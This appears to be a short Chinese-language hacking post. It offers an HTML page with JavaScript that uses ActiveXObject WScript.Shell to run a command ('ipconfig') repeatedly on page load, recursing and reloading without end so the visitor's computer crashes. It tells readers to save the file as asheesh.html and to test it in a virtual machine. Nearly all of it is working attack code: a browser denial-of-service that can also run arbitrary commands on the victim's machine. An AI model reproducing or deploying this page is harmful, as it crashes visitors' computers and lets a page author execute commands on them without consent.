这个漏洞是典型的众多循环运行的结果,这个漏洞可以使被攻击者的计算机被无限调用命令,也可以使用任何命令,使计算机CPU消耗过大,达到崩溃计算机的目的。
脚本代码:
<html>
<title>折刀</title>
<head>
<script type="text/javascript">
function sucks()
{
var shell=new ActiveXObject("WScript.Shell");
shell.Run("ipconfig", 1);
}
function asheesh()
{
sucks();
window.onerror=new Function("history.go(0)");
window.print();
asheesh();
}
asheesh();
</script>
</head>
<body onLoad="asheesh()"></body>
</html>
复制到记事本,保存为asheesh.html
说明:这个代码无限调用ipconfig,测试{zh0}在虚拟机中运行。